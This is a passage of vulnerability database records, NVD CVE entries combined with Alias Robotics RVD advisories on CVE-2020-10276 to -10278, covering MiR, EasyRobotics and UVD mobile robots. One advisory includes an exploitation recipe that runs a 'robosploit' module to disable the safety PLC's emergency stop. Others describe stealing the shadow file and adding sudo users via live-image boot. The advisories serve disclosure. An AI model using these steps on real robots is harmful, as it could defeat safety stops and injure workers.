"versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir250:-:*:*:*:*:*:*:*", "matchCriteriaId": "44C6FCBE-E111-419E-8F8D-2F4702D821BA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir500_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "8C63DB5B-961D-4FDD-AB12-01DC24AFC0B9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir500:-:*:*:*:*:*:*:*", "matchCriteriaId": "E2BC5C9E-1AF3-4009-844E-6E64E4D766A8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir1000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "171A2B04-114B-4C5F-9F2C-515A1E37F300", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "C86EB588-CD48-456B-90C6-C482636508AE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:easyrobotics:er200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "42AB077F-A829-4A9F-8AFF-CBC9222EAE55", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:easyrobotics:er200:-:*:*:*:*:*:*:*", "matchCriteriaId": "C275F303-4494-4C06-95CC-8969E01F8ADA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:easyrobotics:er-lite_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "68599AB3-679D-4E86-B8F4-7939A0373EA2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:easyrobotics:er-lite:-:*:*:*:*:*:*:*", "matchCriteriaId": "53543812-4D0D-4191-8B21-803D2F9790B6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:easyrobotics:er-flex_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "1252DDB6-D090-499B-B505-E17625DB88AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:easyrobotics:er-flex:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D84C826-05A4-44A6-BD12-77805A993A5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:easyrobotics:er-one_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "29230027-8A11-48CA-A4E5-63953EB7CAE3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:easyrobotics:er-one:-:*:*:*:*:*:*:*", "matchCriteriaId": "C7FFA6B9-1A77-4C25-8120-6844B8700527", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:uvd-robots:uvd_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "0C870ABF-C324-442E-9738-025397CB3C47", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:uvd-robots:uvd:-:*:*:*:*:*:*:*", "matchCriteriaId": "87684074-A107-4FE3-A840-C5CB3B8025AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "798" ]
798
https://github.com/aliasrobotics/RVD/issues/2558
[ "Third Party Advisory" ]
github.com
[ "aliasrobotics", "RVD" ]
```yaml id: 2558 title: 'RVD#2558: Default credentials on SICK PLC allows disabling safety features' type: vulnerability description: The password for the safety PLC is the default and thus easy to find (in manuals, etc.). This allows a manipulated program to be uploaded to the safety PLC, effectively disabling the emergency stop in case an object is too close to the robot. Navigation and any other components dependent on the laser scanner are not affected (thus it is hard to detect before something happens) though the laser scanner configuration can also be affected altering further the safety of the device. cwe: CWE-798 cve: CVE-2020-10276 keywords: - MiR100, MiR200, MiR500, MiR250, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD, Autentication system: MiR100:v2.8.1.1 and before, MiR200, MiR250, MiR500, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD vendor: Mobile Industrial Robots A/S, EasyRobotics, Enabled Robotics, UVD Robots severity: rvss-score: 9.4 rvss-vector: RVSS:1.0/AV:IN/AC:H/PR:L/UI:N/Y:Z/S:U/C:H/I:H/A:H/H:H severity-description: Critical cvss-score: 9.8 cvss-vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H links: - https://cwe.mitre.org/data/definitions/798.html - http://bernharddieber.com/publication/taurer2019mirsafety - https://github.com/aliasrobotics/RVD/issues/2558 flaw: phase: runtime-operation specificity: general-issue architectural-location: Plataform code application: Safety PLC subsystem: Sensing:Safety_PLC package: N/A languages: Flexi Soft Designer date-detected: 2019-07-01 detected-by: Bernhard Dieber (Joanneum Research) detected-by-method: testing dynamic date-reported: '2020-06-24' reported-by: "Victor Mayoral Vilches (Alias Robotics)" reported-by-relationship: security researcher issue: https://github.com/aliasrobotics/RVD/issues/2558 reproducibility: Always trace: Not disclosed reproduction: Not disclosed reproduction-image: Not disclosed exploitation: description: Not disclosed exploitation-image: Not disclosed exploitation-vector: Not disclosed exploitation-recipe: networks: - network: - driver: overlay - name: mireth-network - encryption: false containers: - container: - name: mir100 - modules: - base: registry.gitlab.com/aliasrobotics/offensive/alurity/robo_mir100:2.8.1.1 - network: mireth-network - container: - name: attacker - modules: - base: registry.gitlab.com/aliasrobotics/offensive/alurity/comp_ros:latest - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/expl_robosploit/expl_robosploit:latest - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/deve_atom:latest - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/reco_nmap:latest - network: mireth-network flow: - container: - name: attacker - window: - name: attacker - commands: - command: 'export TARGET=$(nslookup mir100 | awk "NR==6{print$2}" | sed "s/Address: //g")' - command: robosploit -m exploits/mir/safety/plc_disable - container: - name: mir100 - window: - name: setup - commands: - command: mkdir /var/run/sshd - command: /usr/sbin/sshd - command: /bin/sleep 5 - command: sudo mkdir /run/lock - command: /etc/init.d/apache2 start - split: horizontal - command: /bin/sleep 2 - command: python /usr/local/mir/software/robot/release/db_backup.py - command: /etc/init.d/mysql start - command: /bin/sleep 2 - command: /usr/sbin/mysqld --verbose & - window: - name: ros - commands: - command: python /usr/local/mir/software/robot/release/db_backup.py - command: sudo apt-key adv --keyserver 'hkp://keyserver.ubuntu.com:80' --recv-key C1CF6E31E6BADE8868B172B4F42ED6FBAB17C654 - command: sudo apt-get update - command: roslaunch mirCommon mir_bringup.launch - select: setup - attach: attacker mitigation: description: Not disclosed pull-request: Not disclosed date-mitigation: null ```
RVD#2558: Default credentials on SICK PLC allows disabling safety features
https://api.github.com/repos/aliasrobotics/RVD/issues/2558/comments
0
2020-06-24T04:45:55Z
2020-07-10T06:38:05Z
https://github.com/aliasrobotics/RVD/issues/2558
644,314,162
2,558
1,315
CVE-2020-10277
2020-06-24T05:15:13.347
There is no mechanism in place to prevent a bad operator to boot from a live OS image, this can lead to extraction of sensible files (such as the shadow file) or privilege escalation by manually adding a new user with sudo privileges on the machine.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "baseScore": 6.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H", "version": "3.0" }, "exploitabilityScore": 0.9, "impactScore": 5.5, "source": "cve@aliasrobotics.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "baseScore": 6.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H", "version": "3.1" }, "exploitabilityScore": 0.9, "impactScore": 5.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@aliasrobotics.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2562" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2562" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir100_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "4C1ED80A-1AE1-4868-AD13-F37079F69B60", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir100:-:*:*:*:*:*:*:*", "matchCriteriaId": "11F1060F-0F43-4920-A05D-593E784B1A0B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "0E52858B-51DE-44BC-A4BB-D199F1281D72", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir200:-:*:*:*:*:*:*:*", "matchCriteriaId": "2B0F7F08-D5D5-4DA8-B2B2-5EA2997AEE3D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir250_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "0F19DD45-1C6E-498C-A961-5EDB4823B12C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir250:-:*:*:*:*:*:*:*", "matchCriteriaId": "44C6FCBE-E111-419E-8F8D-2F4702D821BA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir500_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "8C63DB5B-961D-4FDD-AB12-01DC24AFC0B9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir500:-:*:*:*:*:*:*:*", "matchCriteriaId": "E2BC5C9E-1AF3-4009-844E-6E64E4D766A8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir1000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "171A2B04-114B-4C5F-9F2C-515A1E37F300", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "C86EB588-CD48-456B-90C6-C482636508AE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:easyrobotics:er200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "42AB077F-A829-4A9F-8AFF-CBC9222EAE55", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:easyrobotics:er200:-:*:*:*:*:*:*:*", "matchCriteriaId": "C275F303-4494-4C06-95CC-8969E01F8ADA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:easyrobotics:er-lite_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "68599AB3-679D-4E86-B8F4-7939A0373EA2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:easyrobotics:er-lite:-:*:*:*:*:*:*:*", "matchCriteriaId": "53543812-4D0D-4191-8B21-803D2F9790B6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:easyrobotics:er-flex_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "1252DDB6-D090-499B-B505-E17625DB88AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:easyrobotics:er-flex:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D84C826-05A4-44A6-BD12-77805A993A5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:easyrobotics:er-one_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "29230027-8A11-48CA-A4E5-63953EB7CAE3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:easyrobotics:er-one:-:*:*:*:*:*:*:*", "matchCriteriaId": "C7FFA6B9-1A77-4C25-8120-6844B8700527", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:uvd-robots:uvd_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "0C870ABF-C324-442E-9738-025397CB3C47", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:uvd-robots:uvd:-:*:*:*:*:*:*:*", "matchCriteriaId": "87684074-A107-4FE3-A840-C5CB3B8025AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "656" ]
656
https://github.com/aliasrobotics/RVD/issues/2562
[ "Third Party Advisory" ]
github.com
[ "aliasrobotics", "RVD" ]
```yaml id: 2562 title: 'RVD#2562: Booting from a live image leads to exfiltration of sensible information and privilege escalation' type: vulnerability description: There is no mechanism in place to prevent a bad operator to boot from a live OS image, this can lead to extraction of sensible files (such as the shadow file) or privilege escalation by manually adding a new user with sudo privileges on the machine. cwe: CWE-656 cve: CVE-2020-10277 keywords: - MiR100, MiR200, MiR500, MiR250, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD system: MiR100:v2.8.1.1 and before, MiR200, MiR250, MiR500, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD vendor: Mobile Industrial Robots A/S, EasyRobotics, Enabled Robotics, UVD Robots severity: rvss-score: 7.3 rvss-vector: RVSS:1.0/AV:PR/AC:L/PR:N/UI:N/S:U/Y:Z/C:H/I:L/A:H/H:N/ severity-description: high cvss-score: 6.4 cvss-vector: CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H links: - https://cwe.mitre.org/data/definitions/656.html - https://github.com/aliasrobotics/RVD/issues/2562 flaw: phase: testing specificity: General Issue architectural-location: application-specific application: Ubuntu subsystem: N/A package: N/A languages: N/A date-detected: 2020-06-11 detected-by: Lander Usategui, Alfonso Glera (Alias Robotics) detected-by-method: testing-dynamic date-reported: '2020-06-24' reported-by: "Victor Mayoral Vilches (Alias Robotics)" reported-by-relationship: security researcher issue: https://github.com/aliasrobotics/RVD/issues/2562 reproducibility: always trace: Not disclosed reproduction: Not disclosed reproduction-image: Not disclosed exploitation: description: Not disclosed exploitation-image: Not disclosed exploitation-vector: Not disclosed exploitation-recipe: '' mitigation: description: Not disclosed pull-request: Not disclosed date-mitigation: null ```
RVD#2562: Booting from a live image leads to exfiltration of sensible information and privilege escalation
https://api.github.com/repos/aliasrobotics/RVD/issues/2562/comments
0
2020-06-24T04:52:57Z
2020-07-10T06:38:07Z
https://github.com/aliasrobotics/RVD/issues/2562
644,316,520
2,562
1,316
CVE-2020-10278
2020-06-24T05:15:13.443
The BIOS onboard MiR's Computer is not protected by password, therefore, it allows a Bad Operator to modify settings such as boot order. This can be leveraged by a Malicious operator to boot from a Live Image.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H", "version": "3.0" }, "exploitabilityScore": 0.9, "impactScore": 4.7, "source": "cve@aliasrobotics.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "PHYSICAL", "availabilityImpact": "NONE", "baseScore": 4.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 0.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@aliasrobotics.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2561" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2561" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir100_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "BBDEDA2D-26AB-4F23-B672-D0C89A7BEFB9", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir100:-:*:*:*:*:*:*:*", "matchCriteriaId": "D0989373-02AB-4E05-BAC2-0522A641D73A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "78E261B1-C56F-4428-9D53-5BBCCACEAFCF", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir200:-:*:*:*:*:*:*:*", "matchCriteriaId": "7BF40B1F-0DD2-4B8A-BFBA-A7E641DC3316", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir250_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "877EEDC4-E86F-420D-81C6-3F632C787003", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir250:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD1AE2A0-D83D-441B-856B-7E6FAB065C0D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir500_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "335CA5FE-5AFD-4D49-9A88-1CD71C9281BE", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir500:-:*:*:*:*:*:*:*", "matchCriteriaId": "F57611E0-5CB2-40FD-8420-ED13A1C4863F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir1000_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "6865A559-8CA9-4F51-AC43-35BDF5201B91", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "04043B16-E401-4D2C-9812-71923CEA2716", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robotics:er200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "39BD42AA-95E1-4A02-BB9D-C54AE6BAF9B2", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robotics:er200:-:*:*:*:*:*:*:*", "matchCriteriaId": "D8A47E5E-7754-47EA-B02D-8A7F54124ED4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:enabled-robotics:er-lite_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "DF0E5CFB-6C15-4BB1-97D8-DD52F68190DD", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:enabled-robotics:er-lite:-:*:*:*:*:*:*:*", "matchCriteriaId": "472A560B-547D-4C9F-BE86-ED602FA32799", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:enabled-robotics:er-flex_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "D5528AFD-75DF-4296-9A29-4BD00AB76273", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:enabled-robotics:er-flex:-:*:*:*:*:*:*:*", "matchCriteriaId": "654488E4-161E-40B5-9E0B-BE68F5F38E91", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:enabled-robotics:er-one_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "CD6E62F4-9C15-49AA-BFB7-81443D40B9B9", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:enabled-robotics:er-one:-:*:*:*:*:*:*:*", "matchCriteriaId": "1BB77317-78C0-4800-8E1D-498979B6CB06", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:uvd-robots:uvd_robots_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "A7452D74-36A5-4C87-AA20-8E9A80724EAA", "versionEndExcluding": null, 